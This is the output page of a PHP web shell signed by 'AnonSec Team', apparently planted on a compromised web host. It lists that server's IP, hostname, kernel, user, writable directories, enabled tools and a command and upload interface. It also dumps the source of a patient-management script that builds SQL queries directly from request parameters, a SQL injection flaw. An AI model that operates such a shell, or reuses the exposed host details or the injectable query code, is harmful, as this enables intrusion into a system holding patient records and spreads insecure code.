Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.16.139.8
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in/updateRemark.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
include("dbconnection.php");
include("header.php");
include 'workdeskmenu.php';
if(isset($_POST[sample]))
	{
	$sql ="UPDATE tat SET solution='$_POST[solution]',stop_date='".date('Y-m-d')."',updated_at='".date("F d, Y / h:i:s A")."',status='1'  WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
if($qsql = mysqli_query($con,$sql))
		{
    echo "<script>alert('Basic Profile update successfully');</script><script> window.history.go(-2)</script>;</script>";
  } else {
    echo "Sorry, there was an error uploading your file.";
  } 
    
}
$DisplayForm=True;
	$sql ="SELECT * FROM investigation WHERE  patientid='$_GET[patientid]' And Investigation_type='Pathology' AND patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
		$qsql = mysqli_query($con,$sql);
		while($rsi = mysqli_fetch_array($qsql))
		{
		$sql ="SELECT * FROM Collect_Sample WHERE Container_Number='$rsi[id]'";
		$qsql = mysqli_query($con,$sql);
		if($rh = mysqli_fetch_array($qsql))
		{
$DisplayForm=False;
echo "<script>window.location='show_collectsample.php?Container_Number='$rsi[id]'</script>";
}
}
if($DisplayForm)
{
?>
<div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
  <form name="sample" method="post">
		<?php
		require_once("../dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$sql1 ="SELECT * FROM tat WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($rsi = mysqli_fetch_array($qsql1))
		{
		$sql ="SELECT * FROM patient WHERE patientid='$rsi[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rsp = mysqli_fetch_array($qsql))
		{
		  echo"<input type='hidden'  name='ivid'  id='ivid' value='$rsi[ivid]' readonly>
				<label>UHID</label>
				<input type='text'  name='patientid'  id='patientid' value='$rsp[patientid]' readonly>
				<label>Patient Name</label>
				<input type='text'  name='patientname' id='patientid' value='$rsp[patientname]' readonly>
				
						<label>Corrective Action</label>
					<input type='text'  name='solution' id='solution' value='$rsi[solution]'>
";
	    }
	    echo"
	    <input type='submit' name='sample' value='Update'>
	    ";
		}
			?> 
		<?php
}
?>
 </form>

Anon7 - 2022
AnonSec Team